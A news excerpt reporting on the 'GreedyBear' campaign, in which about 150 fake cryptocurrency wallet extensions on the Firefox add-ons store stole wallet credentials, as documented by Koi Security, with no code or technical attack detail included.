A malicious campaign dubbed 'GreedyBear' has snuck onto the Mozilla add-ons store, targeting Firefox users with 150 malicious extensions and stealing an estimated $1,000,000 from unsuspecting victims.
The campaign, discovered and documented by Koi Security, impersonates cryptocurrency wallet extensions from well-known platforms such as MetaMask, TronLink, and Rabby.
These extensions are uploaded in a benign form initially, to be accepted by Firefox, and accumulate fake positive reviews.
At a later phase, the publishers strip out the original branding and replace it with new names and logos while also injecting malicious code to steal users' wallet credentials and IP addresses.
Add-on before it turns malicious
Source: Koi Security
The malicious code acts as a keylogger, capturing input from form fields or within displayed popups, which are then sent to the attacker's server.
"The weaponized extensions captures wallet credentials directly from user input fields within the extension’s own popup interface, and exfiltrate them to a remote server controlled by the group," explains Koi Security's Tuval Admoni.
"During initialization, they also transmit the victim’s external IP address, likely for tracking or targeting purposes."
The crypto-draining operation is complemented by dozens of Russian-speaking pirated software websites that facilitate the distribution of 500 distinct malware executables, and also a network of websites impersonating Trezor, Jupiter Wallet, and fake wallet repair services.
... continue reading